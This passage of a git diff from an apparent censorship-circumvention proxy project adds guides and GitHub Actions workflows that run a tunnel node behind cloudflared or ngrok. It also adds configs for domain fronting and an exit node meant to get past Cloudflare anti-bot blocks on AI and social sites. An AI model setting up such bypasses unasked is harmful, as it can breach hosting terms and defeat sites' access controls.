+2. A tunneling service (cloudflared or ngrok) exposes the container to the
+   internet on a public URL
+3. `CodeFull.gs` is configured to forward tunnel traffic to this URL
+4. The runner stays alive for 6 hours, then shuts down automatically
+5. The workflow can be re-triggered at any time for another 6-hour session
+
+## Available Methods
+
+Three methods are provided, ordered by setup complexity. Each is documented in
+its own guide with step-by-step instructions.
+
+| # | Method | Guide | Account Required | URL Behavior | Iran ISP friendly? |
+|---|---|---|---|---|---|
+| 1 | cloudflared Quick Tunnel | [cloudflared-quick.md][quick] | None | New URL each session | ⚠️ See note below |
+| 2 | ngrok Tunnel | [ngrok.md][ngrok] | ngrok (free) | **Permanent URL** | ⚠️ `.dev` TLD blocked on some ISPs |
+| 3 | cloudflared Named Tunnel | [cloudflared-named.md][named] | Cloudflare + domain | **Permanent URL** | ⚠️ See note below |
+
+> **⚠️ ngrok `*.ngrok-free.dev` block (early 2026).** Free-tier ngrok now
+> auto-assigns `*.ngrok-free.dev` domains exclusively for new accounts (the
+> older `*.ngrok-free.app` is grandfathered for existing accounts only and
+> cannot be claimed). Some Iran ISPs (TCI, Irancell, IRMCI confirmed via
+> #924) block `*.ngrok-free.dev` at DNS or TCP. Symptom: `curl` from your
+> network to your ngrok URL times out, but works from a non-Iran machine.
+> Workarounds: try **Method 1 (cloudflared Quick)** as a different TLD, or
+> pay $10/mo for ngrok Personal plan to get `*.ngrok.app` instead.
+>
+> **⚠️ cloudflared methods may not work from Iran ISP.** Apps Script
+> outbound runs from Google datacenter IPs, which Cloudflare's anti-bot
+> system sometimes flags as bots and serves a 403 / Persian Google Docs
+> error page (#849). cloudflared Methods 1 and 3 may still work for users
+> on networks where Cloudflare's anti-bot heuristics aren't firing against
+> Apps Script's outbound — try them and check.
+
+**New to Full tunnel mode?** Try [Method 2 (ngrok)][ngrok] first — it's the
+fastest setup and gives a permanent URL on the free tier. If `*.ngrok-free.dev`
+is blocked on your ISP (curl times out), switch to [Method 1 (cloudflared
+Quick)][quick] — different TLD, sometimes passes where ngrok's `.dev`
+doesn't. If both fail, see the **Alternative hosts** section below.
+
+**Need a stable URL on a CF-friendly domain?** Use [Method 3][named] — requires
+a one-time Cloudflare CLI setup with your own domain.
+
+## Alternative hosts (when GitHub Actions tunnels don't work)
+
+If both ngrok and cloudflared paths are blocked on your network, run
+`mhrv-tunnel-node` somewhere that doesn't rely on a third-party tunnel:
+
+- **HuggingFace Spaces (Docker SDK)**: free, permanent `*.hf.space` URL,
+  no tunnel layer needed. Create a Space → pick Docker SDK → small
+  Dockerfile that runs `ghcr.io/therealaleph/mhrv-tunnel-node:latest`.
+  16 GB storage, 2 vCPU. Most Iran-friendly option in 2026.
+- **Replit (Deno repl)**: signup with email, free tier. Run
+  `mhrv-tunnel-node` and the Repl exposes a public URL.
+- **Your own VPS**: Hetzner / Vultr / DigitalOcean / ArvanCloud. ~$3-5/mo.
+  See [tunnel-node README](../../tunnel-node/README.md) for Docker setup.
+
+## Shared Requirements
+
+All methods share these requirements:
+
+| Requirement | Details |
+|---|---|
+| GitHub account | Free. Repository must be private to keep secrets secure. |
+| Google account | Free. Used to deploy `CodeFull.gs`. |
+| `CodeFull.gs` deployed | See the main project documentation for deployment instructions. |
+| `TUNNEL_AUTH_KEY` secret | A strong password shared between the workflow and `CodeFull.gs`. |
+
+## After Starting the Tunnel
+
+1. Run the workflow from your repository's **Actions** tab
+2. Copy the `TUNNEL_SERVER_URL` from the workflow log output
+3. Update the `TUNNEL_SERVER_URL` constant in `CodeFull.gs`
+4. Deploy `CodeFull.gs` (Deploy → New Deployment → Web App)
+5. Configure your `mhrv-rs` client to use the new deployment in Full mode
+
+For Method 1 (cloudflared Quick) the URL is fresh every session, so steps 2–4
+must be repeated each time. For Method 2 (ngrok), free-tier accounts now get a
+**static domain** by default — once assigned, the URL is the same across runs
+and `CodeFull.gs` only needs to be updated once. Method 3 uses a permanent
+URL — configure `CodeFull.gs` once and only re-trigger the workflow when
+needed.
+
+## Limitations
+
+- **6-hour maximum per session.** GitHub Actions enforces a 360-minute timeout
+  on hosted runners. Re-trigger the workflow for another session.
+- **URL changes on restart (Method 1).** cloudflared Quick assigns a fresh
+  `*.trycloudflare.com` URL at runtime. `CodeFull.gs` must be updated and
+  redeployed each session. Method 2 (ngrok) keeps the same URL across runs
+  on accounts with a static domain assigned (the free-tier default).
+- **Shared IP ranges.** GitHub-hosted runners share IP ranges with other users.
+  Some websites may already have these IPs flagged.(sometimes need re-run)
+- **GitHub Actions terms.** This workflow is intended for occasional personal
+  use. Review [GitHub's Terms for Additional Products and Features][gh-terms]
+  and ensure your usage complies.
+
+## Compliance Note
+
+This workflow uses GitHub-hosted runners for a purpose adjacent to, but not
+directly part of, software development on the repository. Usage is low-burden
+(a single Docker container, moderate outbound traffic for one user) and aligns
+with GitHub's acceptable use guidelines for development and testing
+infrastructure. Continuous, high-bandwidth, or commercial use is not
+recommended. For persistent Full mode operation, a dedicated VPS remains the
+recommended solution.
+
+[quick]: cloudflared-quick.md
+[ngrok]: ngrok.md
+[named]: cloudflared-named.md
+[gh-terms]: https://docs.github.com/en/site-policy/github-terms/github-terms-for-additional-products-and-features#actions
diff --git a/assets/github-actions-tunnel/cloudflared-named.md b/assets/github-actions-tunnel/cloudflared-named.md
new file mode 100644
index 00000000..e43ee2af
--- /dev/null
+++ b/assets/github-actions-tunnel/cloudflared-named.md
@@ -0,0 +1,187 @@
+# cloudflared Named Tunnel
+
+Run a Full tunnel with a **permanent, unchanging URL** using a Cloudflare
+account and a custom domain. The tunnel URL never changes between restarts —
+configure `CodeFull.gs` once and only re-trigger the workflow when needed.
+
+## Prerequisites
+
+- A GitHub account (free)
+- A Cloudflare account with a domain
+- `cloudflared` installed on your local machine for one-time setup
+- `CodeFull.gs` deployed as a Google Apps Script Web App
+
+## One-Time Local Setup
+
+These steps are performed **once** on your local machine. They create a named
+tunnel on Cloudflare and route your domain to it.
+
+### Step 1: Install cloudflared
+
+**Linux (Debian/Ubuntu):**
+```bash
+curl -L --output cloudflared.deb \
+  https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb
+sudo dpkg -i cloudflared.deb
+```
+
+**macOS:**
+```bash
+brew install cloudflared
+```
+
+**Windows:**
+Download the installer from the [cloudflared releases page](https://github.com/cloudflare/cloudflared/releases).
+
+### Step 2: Authenticate with Cloudflare
+
+```bash
+cloudflared tunnel login
+```
+
+This opens a browser window. Select your domain and authorize.
+
+### Step 3: Create a Named Tunnel
+
+```bash
+cloudflared tunnel create my-tunnel
+```
+
+This outputs a tunnel ID (a UUID) and creates a credentials file at:
+```
+~/.cloudflared/<TUNNEL_ID>.json
+```
+
+Copy the tunnel ID — you will need it later.
+
+### Step 4: Route Your Domain
+
+```bash
+cloudflared tunnel route dns my-tunnel tunnel.yourdomain.com
+```
+
+Replace `tunnel.yourdomain.com` with the actual subdomain you want to use.
+This creates a DNS record on Cloudflare pointing to your tunnel.
+
+### Step 5: Get the Credentials File
+
+```bash
+cat ~/.cloudflared/<TUNNEL_ID>.json
+```
+
+Copy the entire JSON output. You will use this as the
+`CLOUDFLARE_TUNNEL_CREDENTIALS` secret in GitHub Actions.
+
+## GitHub Setup
+
+### Step 6: Create the Repository
+
+If you already have a repository from another method, you can reuse it.
+Otherwise:
+
+1. Go to [github.com](https://github.com) and sign in
+2. Click the **+** icon in the top-right corner, then **New repository**
+3. Enter a repository name (e.g., `my-tunnel`)
+4. Select **Private** (recommended — keeps your secrets secure)
+5. Click **Create repository**
+
+### Step 7: Add the Secrets
+
+1. In your repository, go to **Settings > Secrets and variables > Actions**
+2. Click **New repository secret** and add each of the following:
+
+   | Name | Value |
+   |---|---|
+   | `TUNNEL_AUTH_KEY` | A strong password. You will also set this in `CodeFull.gs`. |
+   | `CLOUDFLARE_TUNNEL_ID` | The tunnel ID from Step 3. |
+   | `CLOUDFLARE_TUNNEL_HOSTNAME` | The subdomain you configured in Step 4 (e.g., `tunnel.yourdomain.com`). |
+   | `CLOUDFLARE_TUNNEL_CREDENTIALS` | The entire JSON contents of the credentials file from Step 5. |
+
+3. Click **Add secret** for each
+
+### Step 8: Add the Workflow
+
+1. In your repository, go to the **Actions** tab
+2. Click **New workflow**
+3. Click the **set up a workflow yourself** link
+4. Delete the default content and paste the contents of `cloudflared-named.yml` [[here]]
+5. Click **Commit changes...**, add a commit message, then click **Commit changes**
+
+The workflow file will be saved to `.github/workflows/cloudflared-named.yml`.
+
+### Step 9: Run the Workflow
+
+1. Go to the **Actions** tab
+2. Select **Full Tunnel (cloudflared Named)** from the left sidebar
+3. Click **Run workflow > Run workflow**
+
+The workflow will start immediately.
+
+### Step 10: Configure CodeFull.gs
+
+Open `CodeFull.gs` in the Google Apps Script editor and update these constants:
+
+```javascript
+const TUNNEL_SERVER_URL = "https://tunnel.yourdomain.com";
+const TUNNEL_AUTH_KEY = "the-secret-you-set-in-step-7";
+```
+
+Deploy: **Deploy > New Deployment > Web App**.
+Copy the new Deployment ID and update your `mhrv-rs` config.
+
+**This step is performed only once.** The tunnel URL never changes between
+restarts.
+
+### Step 11: Verify
+
+Use `mhrv-rs test` or visit `https://ipleak.net` through your proxy.
+You should see a Cloudflare IP address.
+
+## How It Works
+
+1. GitHub Actions starts a Docker container running `mhrv-tunnel-node` on port
+   `8080`
+2. `cloudflared` connects to Cloudflare using the named tunnel credentials
+3. Cloudflare routes traffic from your custom domain to the runner through a
+   secure, persistent tunnel
+4. `CodeFull.gs` forwards tunnel operations to your custom domain over HTTPS
+5. The runner stays alive for 6 hours, then shuts down automatically
+6. On restart, the same domain routes to the new runner — no configuration
+   changes needed
+
+## Restarting the Tunnel
+
+The tunnel shuts down after 6 hours. To start a new session:
+
+1. Go to the **Actions** tab
+2. Select **Full Tunnel (cloudflared Named)**
+3. Click **Run workflow > Run workflow**
+
+That is all — the URL is permanent so `CodeFull.gs` does not need to be updated.
+
+For automatic restarts every 6 hours, add a `schedule` trigger to the workflow:
+
+```yaml
+on:
+  workflow_dispatch:
+  schedule:
+    - cron: '0 */6 * * *'
+```
+
+## Limitations
+
+- Requires a one-time local setup with `cloudflared` CLI
+- Requires a Cloudflare account with a domain
+- 6-hour maximum per session (GitHub Actions limit)
+
+## Troubleshooting
+
+| Problem | Solution |
+|---|---|
+| `cloudflared tunnel login` fails | Ensure your browser can reach `dash.cloudflare.com`. You may need to use a proxy or alternative network for this step. |
+| `cloudflared tunnel create` fails | Verify you are authenticated. Run `cloudflared tunnel login` again. |
+| Workflow fails at Docker step | GitHub Actions may be pulling the image for the first time. Wait 2-3 minutes and retry. |
+| `cloudflared` fails to connect | Verify all four secrets are set correctly. Check that `CLOUDFLARE_TUNNEL_CREDENTIALS` contains valid JSON. |
+| `CodeFull.gs` returns 502 or timeout | Verify the workflow is still running. Check that `TUNNEL_AUTH_KEY` matches in both the secret and `CodeFull.gs`. Ensure the DNS record was created in Step 4. |
+
+[here]: cloudflared-named.yml
diff --git a/assets/github-actions-tunnel/cloudflared-named.yml b/assets/github-actions-tunnel/cloudflared-named.yml
new file mode 100644
index 00000000..38f12814
--- /dev/null
+++ b/assets/github-actions-tunnel/cloudflared-named.yml
@@ -0,0 +1,52 @@
+name: Full Tunnel (cloudflared Named)
+
+on:
+  workflow_dispatch:
+
+permissions:
+  contents: read
+
+jobs:
+  tunnel:
+    runs-on: ubuntu-latest
+    timeout-minutes: 360
+    steps:
+      - name: Start mhrv-tunnel-node
+        run: |
+          docker run -d --name mhrv-tunnel \
+            -p 8080:8080 \
+            -e TUNNEL_AUTH_KEY="${{ secrets.TUNNEL_AUTH_KEY }}" \
+            ghcr.io/therealaleph/mhrv-tunnel-node:latest
+          sleep 5
+          curl -s http://localhost:8080/health || sleep 5
+
+      - name: Install cloudflared
+        run: |
+          curl -L --output cloudflared.deb \
+            https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb
+          sudo dpkg -i cloudflared.deb
+
+      - name: Configure tunnel
+        run: |
+          mkdir -p ~/.cloudflared
+          echo "${{ secrets.CLOUDFLARE_TUNNEL_CREDENTIALS }}" > ~/.cloudflared/credentials.json
+          cat > ~/.cloudflared/config.yml << EOF
+          tunnel: ${{ secrets.CLOUDFLARE_TUNNEL_ID }}
+          credentials-file: /home/runner/.cloudflared/credentials.json
+          ingress:
+            - hostname: ${{ secrets.CLOUDFLARE_TUNNEL_HOSTNAME }}
+              service: http://localhost:8080
+            - service: http_status:404
+          EOF
+
+      - name: Run tunnel
+        run: |
+          cloudflared tunnel --config ~/.cloudflared/config.yml run &
+          echo "TUNNEL_SERVER_URL = https://${{ secrets.CLOUDFLARE_TUNNEL_HOSTNAME }}"
+          sleep 21000
+
+      - name: Cleanup
+        if: always()
+        run: |
+          docker stop mhrv-tunnel || true
+          pkill cloudflared || true
diff --git a/assets/github-actions-tunnel/cloudflared-quick.md b/assets/github-actions-tunnel/cloudflared-quick.md
new file mode 100644
index 00000000..8d339361
--- /dev/null
+++ b/assets/github-actions-tunnel/cloudflared-quick.md
@@ -0,0 +1,112 @@
+# cloudflared Quick Tunnel
+
+Run a Full tunnel for 6 hours with **zero account setup** beyond GitHub.
+Cloudflare's free Quick Tunnel service provides a temporary public URL — no
+Cloudflare account, no API token, no configuration files required.
+
+## Prerequisites
+
+- A GitHub account (free)
+- `CodeFull.gs` deployed as a Google Apps Script Web App
+- No Cloudflare account or ngrok account needed
+
+## Setup
+
+### Step 1: Create the Repository
+
+1. Go to [github.com](https://github.com) and sign in
+2. Click the **+** icon in the top-right corner, then **New repository**
+3. Enter a repository name (e.g., `my-tunnel`)
+4. Select **Private** (recommended — keeps your secrets secure)
+5. Click **Create repository**
+
+### Step 2: Add the Secret
+
+1. In your new repository, go to **Settings > Secrets and variables > Actions**
+2. Click **New repository secret**
+3. Set **Name** to `TUNNEL_AUTH_KEY`
+4. Set **Value** to a strong password of your choice
+5. Click **Add secret**
+
+You will use this same password later in `CodeFull.gs`.
+
+### Step 3: Add the Workflow
+
+1. In your repository, go to the **Actions** tab
+2. Click **New workflow** (or go to the next step)
+3. Click the **set up a workflow yourself** link
+4. Delete the default content (if exists) and paste the contents of `cloudflared-quick.yml` [[here]]
+5. Click **Commit changes...**, add a commit message, then click **Commit changes**
+
+The workflow file will be saved to `.github/workflows/main.yml`.
+(name does not matter and you can change it to anything)
+
+### Step 4: Run the Workflow
+
+1. Go to the **Actions** tab
+2. Select **Full Tunnel (cloudflared Quick)** from the left sidebar
+3. Click **Run workflow > Run workflow**
+
+The workflow will start immediately.
+
+### Step 5: Get the Tunnel URL
+
+1. Click on the running workflow to see live logs
+2. Wait for the **Expose tunnel** step to complete (about 15 seconds)
+3. Look for the `::notice::Tunnel URL:` line in the log output
+4. Copy the URL — it will look like `https://random-name.trycloudflare.com`
+
+### Step 6: Configure CodeFull.gs
+
+Open `CodeFull.gs` in the Google Apps Script editor and update these constants:
+
+```javascript
+const TUNNEL_SERVER_URL = "https://random-name.trycloudflare.com";
+const TUNNEL_AUTH_KEY = "the-secret-you-set-in-step-2";
+```
+
+Deploy: **Deploy > New Deployment > Web App**.
+Copy the new Deployment ID and update your `mhrv-rs` config.
+
+### Step 7: Verify
+
+Use `mhrv-rs test` or visit `https://ipleak.net` through your proxy.
+
+## How It Works
+
+1. GitHub Actions starts a Docker container running `mhrv-tunnel-node` on port
+   `8080`
+2. `cloudflared` creates a free Quick Tunnel — a temporary `*.trycloudflare.com`
+   subdomain that routes to `localhost:8080` on the runner
+3. The workflow extracts this URL from the `cloudflared` logs and displays it
+4. `CodeFull.gs` forwards tunnel operations to this URL over HTTPS
+5. The runner stays alive for 6 hours, then shuts down automatically
+
+No DNS configuration, no SSL certificates, no port forwarding — `cloudflared`
+handles everything.
+
+## Renewing the Tunnel
+
+The tunnel shuts down after 6 hours. To start a new session:
+
+1. Go to the **Actions** tab
+2. Select **Full Tunnel (cloudflared Quick)**
+3. Click **Run workflow > Run workflow**
+4. Copy the **new** tunnel URL from the logs (it changes each time)
+5. Update `TUNNEL_SERVER_URL` in `CodeFull.gs` and redeploy
+
+## Limitations
+
+- The `*.trycloudflare.com` URL changes every time the workflow runs
+- `CodeFull.gs` must be updated and redeployed each session
+- 6-hour maximum per session (GitHub Actions limit)
+
+## Troubleshooting
+
+| Problem | Solution |
+|---|---|
+| Workflow fails at Docker step | GitHub Actions may be pulling the image for the first time. Wait 2-3 minutes and retry. |
+| No tunnel URL appears in logs | Check that the **Expose tunnel** step completed. The URL is extracted from `cloudflared` output — allow 15 seconds for the tunnel to establish. |
+| `CodeFull.gs` returns 502 or timeout | Verify the tunnel URL is correct and the workflow is still running. Check that `TUNNEL_AUTH_KEY` matches in both the secret and `CodeFull.gs`. |
+
+[here]: cloudflared-quick.yml
diff --git a/assets/github-actions-tunnel/cloudflared-quick.yml b/assets/github-actions-tunnel/cloudflared-quick.yml
new file mode 100644
index 00000000..4bc5b246
--- /dev/null
+++ b/assets/github-actions-tunnel/cloudflared-quick.yml
@@ -0,0 +1,43 @@
+name: Full Tunnel (cloudflared Quick)
+
+on:
+  workflow_dispatch:
+
+permissions:
+  contents: read
+
+jobs:
+  tunnel:
+    runs-on: ubuntu-latest
+    timeout-minutes: 360
+    steps:
+      - name: Start mhrv-tunnel-node
+        run: |
+          docker run -d --name mhrv-tunnel \
+            -p 8080:8080 \
+            -e TUNNEL_AUTH_KEY="${{ secrets.TUNNEL_AUTH_KEY }}" \
+            ghcr.io/therealaleph/mhrv-tunnel-node:latest
+          sleep 5
+          curl -s http://localhost:8080/health || sleep 5
+
+      - name: Install cloudflared
+        run: |
+          curl -L --output cloudflared.deb \
+            https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb
+          sudo dpkg -i cloudflared.deb
+
+      - name: Expose tunnel
+        run: |
+          cloudflared tunnel --url http://localhost:8080 2>&1 | tee tunnel.log &
+          sleep 10
+          URL=$(grep -o 'https://[a-zA-Z0-9.-]*\.trycloudflare\.com' tunnel.log | head -1)
+          echo "TUNNEL_URL=$URL" >> $GITHUB_ENV
+          echo "::notice::Tunnel URL: $URL"
+          echo "TUNNEL_SERVER_URL = $URL"
+          sleep 21000
+
+      - name: Cleanup
+        if: always()
+        run: |
+          docker stop mhrv-tunnel || true
+          pkill cloudflared || true
diff --git a/assets/github-actions-tunnel/ngrok.md b/assets/github-actions-tunnel/ngrok.md
new file mode 100644
index 00000000..c80810cf
--- /dev/null
+++ b/assets/github-actions-tunnel/ngrok.md
@@ -0,0 +1,137 @@
+# ngrok Tunnel
+
+Run a Full tunnel for 6 hours using an ngrok account (free tier). ngrok provides
+a public URL that exposes the tunnel-node running on GitHub Actions.
+
+## Prerequisites
+
+- A GitHub account (free)
+- An ngrok account (free — sign up at [ngrok.com](https://ngrok.com))
+- `CodeFull.gs` deployed as a Google Apps Script Web App
+
+## Setup
+
+### Step 1: Get Your ngrok Authtoken
+
+1. Go to [dashboard.ngrok.com](https://dashboard.ngrok.com) and sign in
+2. Copy your authtoken from the **Getting Started** or **Your Authtoken** section
+
+### Step 2: Create the Repository
+
+If you already have a repository from another method, you can reuse it.
+Otherwise:
+
+1. Go to [github.com](https://github.com) and sign in
+2. Click the **+** icon in the top-right corner, then **New repository**
+3. Enter a repository name (e.g., `my-tunnel`)
+4. Select **Private** (recommended — keeps your secrets secure)
+5. Click **Create repository**
+
+### Step 3: Add the Secrets
+
+1. In your repository, go to **Settings > Secrets and variables > Actions**
+2. Click **New repository secret** and add:
+
+   | Name | Value |
+   |---|---|
+   | `TUNNEL_AUTH_KEY` | A strong password. You will also set this in `CodeFull.gs`. |
+   | `NGROK_AUTH_TOKEN` | Your ngrok authtoken from Step 1. |
+
+3. Click **Add secret** for each
+
+### Step 4: Add the Workflow
+
+1. In your repository, go to the **Actions** tab
+2. Click **New workflow**
+3. Click the **set up a workflow yourself** link
+4. Delete the default content and paste the contents of `ngrok.yml` [[here]]
+5. Click **Commit changes...**, add a commit message, then click **Commit changes**
+
+The workflow file will be saved to `.github/workflows/ngrok.yml`.
+
+### Step 5: Run the Workflow
+
+1. Go to the **Actions** tab
+2. Select **Full Tunnel (ngrok)** from the left sidebar
+3. Click **Run workflow > Run workflow**
+
+The workflow will start immediately.
+
+### Step 6: Get the Tunnel URL
+
+1. Click on the running workflow to see live logs
+2. Wait for the **Expose tunnel** step to complete (about 10 seconds)
+3. Look for the `::notice::Tunnel URL:` line in the log output
+4. Copy the URL — it will look like `https://abc123.ngrok-free.app`
+
+### Step 7: Configure CodeFull.gs
+
+Open `CodeFull.gs` in the Google Apps Script editor and update these constants:
+
+```javascript
+const TUNNEL_SERVER_URL = "https://abc123.ngrok-free.app";
+const TUNNEL_AUTH_KEY = "the-secret-you-set-in-step-3";
+```
+
+Deploy: **Deploy > New Deployment > Web App**.
+Copy the new Deployment ID and update your `mhrv-rs` config.
+
+### Step 8: Verify
+
+`mhrv-rs test` is wired only for the apps_script relay path; in Full mode it
+refuses to run. To verify a Full-mode tunnel, visit `https://ipleak.net` (or
+`https://whatismyipaddress.com`) through your proxy — you should see a
+GitHub Actions or ngrok IP address.
+
+## How It Works
+
+1. GitHub Actions starts a Docker container running `mhrv-tunnel-node` on port
+   `8080`
+2. `ngrok` creates a secure tunnel using your authtoken, assigning a temporary
+   `*.ngrok-free.app` URL that routes to `localhost:8080` on the runner
+3. The workflow extracts this URL from the ngrok API and displays it
+4. `CodeFull.gs` forwards tunnel operations to this URL over HTTPS
+5. The runner stays alive for 6 hours, then shuts down automatically
+
+## Renewing the Tunnel
+
+The tunnel shuts down after 6 hours. To start a new session:
+
+1. Go to the **Actions** tab
+2. Select **Full Tunnel (ngrok)**
+3. Click **Run workflow > Run workflow**
+4. Check the tunnel URL in the logs. Each ngrok free account gets one
+   auto-assigned **dev domain** that's permanent across runs — the URL is the
+   same every time you re-run the workflow, so no `CodeFull.gs` update is
+   needed after the initial setup.
+
+## Limitations
+
+- Requires an ngrok account (free tier: 1 online tunnel, limited connections
+  per minute).
+- **ngrok TLD note**: ngrok handed out `*.ngrok-free.app` domains until early
+  2026; new free-tier accounts now get `*.ngrok-free.dev` instead, with no
+  way to switch back. **Some Iran ISPs block `*.ngrok-free.dev` at the DNS
+  layer.** If your tunnel works on a non-Iran network but `curl` from your
+  Iran network times out at TCP, the `.dev` block is why. Workarounds:
+  - Switch to **cloudflared Quick** (Method 1) — different TLD, often passes
+    where ngrok's `.dev` doesn't.
+  - Switch to **HuggingFace Spaces (Docker)** — run tunnel-node directly on
+    a Space, get a permanent `*.hf.space` URL with no tunnel layer.
+  - Pay for ngrok's $10/mo Personal plan to get a `*.ngrok.app` domain
+    (the older, more widely allowlisted TLD).
+- 6-hour maximum per session (GitHub Actions limit).
+- Slightly higher latency than cloudflared methods (extra hop through ngrok's
+  relay servers).
+
+## Troubleshooting
+
+| Problem | Solution |
+|---|---|
+| ngrok authentication fails | Verify `NGROK_AUTH_TOKEN` matches the token in your [ngrok dashboard](https://dashboard.ngrok.com). |
+| Workflow fails at Docker step | GitHub Actions may be pulling the image for the first time. Wait 2-3 minutes and retry. |
+| No tunnel URL appears in logs | Check that the **Expose tunnel** step completed. The URL is fetched from the ngrok API — allow 10 seconds for the tunnel to establish. |
+| Connection limit reached | ngrok's free tier limits connections per minute. Wait a moment and retry. |
+| `CodeFull.gs` returns 502 or timeout | Verify the tunnel URL is correct and the workflow is still running. Check that `TUNNEL_AUTH_KEY` matches in both the secret and `CodeFull.gs`. |
+
+[here]: ngrok.yml
diff --git a/assets/github-actions-tunnel/ngrok.yml b/assets/github-actions-tunnel/ngrok.yml
new file mode 100644
index 00000000..ae4ea050
--- /dev/null
+++ b/assets/github-actions-tunnel/ngrok.yml
@@ -0,0 +1,48 @@
+name: Full Tunnel (ngrok)
+
+on:
+  workflow_dispatch:
+
+permissions:
+  contents: read
+
+jobs:
+  tunnel:
+    runs-on: ubuntu-latest
+    timeout-minutes: 360
+    steps:
+      - name: Start mhrv-tunnel-node
+        run: |
+          docker run -d --name mhrv-tunnel \
+            -p 8080:8080 \
+            -e TUNNEL_AUTH_KEY="${{ secrets.TUNNEL_AUTH_KEY }}" \
+            ghcr.io/therealaleph/mhrv-tunnel-node:latest
+          sleep 5
+          curl -s http://localhost:8080/health || sleep 5
+
+      - name: Install ngrok
+        run: |
+          curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \
+            | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \
+            && echo "deb https://ngrok-agent.s3.amazonaws.com bookworm main" \
+            | sudo tee /etc/apt/sources.list.d/ngrok.list \
+            && sudo apt update \
+            && sudo apt install ngrok
+          ngrok config add-authtoken ${{ secrets.NGROK_AUTH_TOKEN }}
+
+      - name: Expose tunnel
+        id: expose
+        run: |
+          ngrok http 8080 --log=stdout > ngrok.log &
+          sleep 5
+          URL=$(curl -s http://localhost:4040/api/tunnels | python3 -c "import sys,json;print(json.load(sys.stdin)['tunnels'][0]['public_url'])")
+          echo "TUNNEL_URL=$URL" >> $GITHUB_OUTPUT
+          echo "::notice::Tunnel URL: $URL"
+          echo "TUNNEL_SERVER_URL = $URL"
+          sleep 21000
+
+      - name: Cleanup
+        if: always()
+        run: |
+          docker stop mhrv-tunnel || true
+          pkill ngrok || true
diff --git a/assets/launchers/run.bat b/assets/launchers/run.bat
index 11748d99..bf5939c3 100644
--- a/assets/launchers/run.bat
+++ b/assets/launchers/run.bat
@@ -60,10 +60,21 @@ if not "%UI_EXIT%"=="0" (
         echo   - running inside RDP or a VM without GPU acceleration
         echo   - antivirus blocking the exe — whitelist the folder and retry
         echo.
-        echo Copy everything above and open an issue on:
-        echo   https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues
+        echo You can still use mhrv-rs without the UI. Run the CLI directly:
+        echo.
+        echo     mhrv-rs.exe
+        echo.
+        echo Set your config in %%APPDATA%%\mhrv-rs\config\config.json (or
+        echo place a config.json next to mhrv-rs.exe in this folder), then
+        echo point your browser proxy at 127.0.0.1:8085 (HTTP) or
+        echo 127.0.0.1:8086 (SOCKS5). The CLI is the same proxy without
+        echo the UI shell, so all functionality is available.
+        echo.
+        echo Falling back to the CLI now so you can keep using the proxy.
+        echo Press Ctrl+C in the CLI window to stop it.
         echo ---------------------------------------------------
-        pause
+        echo.
+        mhrv-rs.exe
     )
 )
 
diff --git a/config.google-only.example.json b/config.direct.example.json
similarity index 88%
rename from config.google-only.example.json
rename to config.direct.example.json
index 890f966d..c0a95948 100644
--- a/config.google-only.example.json
+++ b/config.direct.example.json
@@ -1,5 +1,5 @@
 {
-  "mode": "google_only",
+  "mode": "direct",
   "google_ip": "216.239.38.120",
   "front_domain": "www.google.com",
   "listen_host": "127.0.0.1",
diff --git a/config.exit-node.example.json b/config.exit-node.example.json
new file mode 100644
index 00000000..8af55161
--- /dev/null
+++ b/config.exit-node.example.json
@@ -0,0 +1,35 @@
+{
+  "_comment": "Example config for using mhrv-rs with an exit-node deployment to bypass Cloudflare anti-bot blocks on chatgpt.com / claude.ai / grok.com / x.com. See assets/exit_node/README.md for the deployment walkthrough.",
+  "mode": "apps_script",
+  "google_ip": "216.239.38.120",
+  "front_domain": "www.google.com",
+  "auth_key": "PUT_YOUR_APPS_SCRIPT_AUTH_KEY_HERE",
+  "script_id": [
+    "PUT_YOUR_APPS_SCRIPT_DEPLOYMENT_ID_HERE"
+  ],
+  "listen_host": "0.0.0.0",
+  "listen_port": 8085,
+  "socks5_port": 8086,
+  "log_level": "info",
+  "verify_ssl": true,
+  "exit_node": {
+    "_comment": "Master switch. Set false to disable exit-node entirely without removing the config. Default false.",
+    "enabled": true,
+    "_comment_relay_url": "Public URL of your deployed exit-node handler (assets/exit_node/exit_node.ts running on Deno Deploy, fly.io, your own VPS, etc.).",
+    "relay_url": "https://your-deployed-exit-node.example.com",
+    "_comment_psk": "Pre-shared key — must match the PSK constant in your deployed source. Generate with: openssl rand -hex 32",
+    "psk": "PUT_YOUR_EXIT_NODE_PSK_HERE",
+    "_comment_mode": "selective: only `hosts` route via exit node (recommended). full: every request routes via exit node (slower, ~250-500ms extra hop).",
+    "mode": "selective",
+    "_comment_hosts": "Hostnames to route through the exit node. Matches exact OR dot-anchored suffix (chatgpt.com covers api.chatgpt.com etc.). Extend for any CF-anti-bot blocked sites you need.",
+    "hosts": [
+      "chatgpt.com",
+      "claude.ai",
+      "x.com",
+      "grok.com",
+      "openai.com",
+      "aistudio.google.com",
+      "ai.google.dev"
+    ]
+  }
+}
diff --git a/config.fronting-groups.example.json b/config.fronting-groups.example.json
new file mode 100644
index 00000000..a1759dc6
--- /dev/null
+++ b/config.fronting-groups.example.json
@@ -0,0 +1,85 @@
+{
+  "mode": "direct",
+  "google_ip": "216.239.38.120",
+  "front_domain": "www.google.com",
+  "listen_host": "127.0.0.1",
+  "listen_port": 8085,
+  "socks5_port": 8086,
+  "log_level": "info",
+  "verify_ssl": true,
+  "fronting_groups": [
+    {
+      "name": "vercel",
+      "ip": "76.76.21.21",
+      "sni": "react.dev",
+      "domains": [
+        "vercel.com",
+        "vercel.app",
+        "vercel.dev",
+        "vercel.live",
+        "vercel.sh",
+        "nextjs.org",
+        "now.sh",
+        "cursor.com",
+        "ai-sdk.dev"
+      ]
+    },
+    {
+      "name": "fastly",
+      "ip": "151.101.1.140",
+      "sni": "www.python.org",
+      "domains": [
+        "redd.it",
+        "reddit.com",
+        "redditstatic.com",
+        "redditmedia.com",
+        "reddit.app.link",
+        "redditblog.com",
+        "reddithelp.com",
+        "redditinc.com",
+        "redditmail.com",
+        "redditspace.com",
+        "redditstatus.com",
+        "reddit.map.fastly.net",
+
+        "githubassets.com",
+        "githubusercontent.com",
+        "github.io",
+
+        "pypi.org",
+
+        "fastly.com",
+        "fastly-edge.com",
